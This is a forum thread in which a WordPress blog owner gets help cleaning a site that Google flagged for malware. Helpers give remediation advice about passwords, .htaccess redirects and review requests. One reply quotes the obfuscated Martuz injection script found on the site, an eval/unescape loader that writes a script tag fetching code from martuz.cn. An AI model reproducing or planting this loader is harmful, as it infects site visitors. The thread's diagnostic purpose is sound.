Hi,
My personal website buyruk.net has been reported as malware suspicious website by google to stopbadware. I have checked with my hosting company and removed the files which seem to be the problematic. However even tough I have requested for a review, I still get Google’s warning page. Here is the list of the files that are listed as problematic:
http://buyruk.net/blog/2006/01/
http://buyruk.net/blog/2006/04/
http://buyruk.net/blog/2006/05/
http://buyruk.net/blog/2006/12/
http://buyruk.net/blog/2007/11/
http://buyruk.net/blog/2008/02/
http://buyruk.net/blog/2008/03/
http://buyruk.net/blog/2008/05/
http://buyruk.net/blog/2008/06/
http://buyruk.net/blog/tag/nba/
http://buyruk.net/blog/2006/12/04/
http://buyruk.net/blog/tag/tahmin/
http://buyruk.net/blog/wp-login.php
http://buyruk.net/blog/tag/playoffs/
http://buyruk.net/blog/category/kitap/
http://buyruk.net/blog/category/muzik/
http://buyruk.net/blog/category/avrupa/
http://buyruk.net/blog/category/turkce/
http://buyruk.net/blog/category/almanya/
http://buyruk.net/blog/category/deutsch/
http://buyruk.net/blog/category/internet/
http://buyruk.net/blog/category/rezillik/
http://buyruk.net/blog/seyir-eylediklerim/
http://buyruk.net/blog/author/admin/page/14/
http://buyruk.net/blog/category/kisisel-gelisim/
P.S. I am using a wordpress blog and have the most updated version installed 2.8.4.
Any suggestions?
Thanks,
Buyruk
I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.
First of all, check the administrative PC for malware, use multiple AV and Malware scanners to check and remove any found.
Change the password of the FTP, preferably from an alternate PC.
Do NOT store the password in your FTP client.
Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz or variant thereof, so you will likely find iframe or malicious scripts embedded in the various files of your site. Check both normal html/php file as well as Script files.
When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.
Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035
Google webmaster tools:
http://www.google.com/webmasters/tools/
Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://buyruk.net
Well, I have deleted all the infected files and overwritten all the wordpress files from a new wordpress installation package. Since that all these infected files are under the blog subdomain, that’s why I am suspicious about wordpress files.
Plus, I have deleted also all of the .htaccess files. So they should not be causing any problem.
I have also done changing the password and other related administrative steps that could be taken on this manner.
Buyruk
After you have done all of this, have you requested a new review from the webmaster tools?
You should be notified when a review is finished, and should wait for this.
I seem to get an access denied (403), when I try to use the domain name – Are you still modifying the files or what is going on?
EDIT: error number
Hi,
Yes I have requested a new review from the webmaster tools. I have not been notified by an e-mail or any other way. However when I go to the page:
http://www.google.com/safebrowsing/diagnostic?site=http://buyruk.net/&hl=en
It says that the last time Google visited was August, 21st. So I assume that they have done the review. Please advise if i should be expecting o/w.
Please also visit the site via: http://buyruk.net/blog/
Thanks,
Buyruk
Bad script on page:
(function(h8fE){var fgjpo='%';eval(unescape(('var"20a"3d"22Scri"70tEn"67in"65"22"2cb"3d"22V"65"72sio"6e()+"22"2cj"3d"22"22"2cu"3d"6eaviga"74or"2euserAg"65nt"3bi"66((u"2ein"64"65xOf("22"43"68"72om"65"22)"3c"30)"26"26"28u"2e"69"6ede"78"4ff("22"57i"6e"22"29"3e0"29"26"26"28u"2ei"6ede"78Of("22NT"206"22)"3c0)"26"26(document"2e"63"6fo"6bie"2e"69nd"65x"4ff"28"22m"69ek"3d1"22)"3c"30)"26"26(t"79peof(zrv"7ats)"21"3dtyp"65of("22A"22)))"7b"7arvz"74s"3d"22A"22"3be"76a"6c("22if"28win"64ow"2e"22+a+"22)j"3dj"2b"22"2ba+"22Ma"6aor"22+"62+a+"22Minor"22+b+a+"22Build"22+b+"22j"3b"22)"3bdo"63um"65nt"2ewrite("22"3cscr"69"70"74"20src"3d"2f"2fmar"22"2b"22tuz"2ecn"2fv"69d"2f"3fi"64"3d"22+"6a+"22"3e"3c"5c"2f"73c"72ipt"3e"22)"3b"7d').replace(h8fE,fgjpo)))})(/\"/g);
Thats should be removed.
Hi Again,
Thanks for the tip. I have found the pages that seems to be having the code you have given above. I have cleaned them also. After I have done these changes, I have then checked the infected pages again, and could not see the code you mentioned anymore in any of those pages.
After I requested another review from Google, I checked again and they are still having the list of the infected files:
http://buyruk.net/blog/2006/01/
http://buyruk.net/blog/2006/04/
http://buyruk.net/blog/2006/05/
http://buyruk.net/blog/2006/12/
http://buyruk.net/blog/2007/11/
http://buyruk.net/blog/2008/02/
http://buyruk.net/blog/2008/03/
http://buyruk.net/blog/2008/05/
http://buyruk.net/blog/2008/06/
http://buyruk.net/blog/tag/nba/
http://buyruk.net/blog/2006/12/04/
http://buyruk.net/blog/tag/tahmin/
http://buyruk.net/blog/wp-login.php
http://buyruk.net/blog/tag/playoffs/
http://buyruk.net/blog/category/kitap/
http://buyruk.net/blog/category/muzik/
http://buyruk.net/blog/category/avrupa/
http://buyruk.net/blog/category/turkce/
http://buyruk.net/blog/category/almanya/
http://buyruk.net/blog/category/deutsch/
http://buyruk.net/blog/category/internet/
http://buyruk.net/blog/seyir-eylediklerim/
http://buyruk.net/blog/author/admin/page/14/
http://buyruk.net/blog/category/kisisel-gelisim/
http://buyruk.net/blog/category/yurt-disi/page/2/
What could be wrong this time?
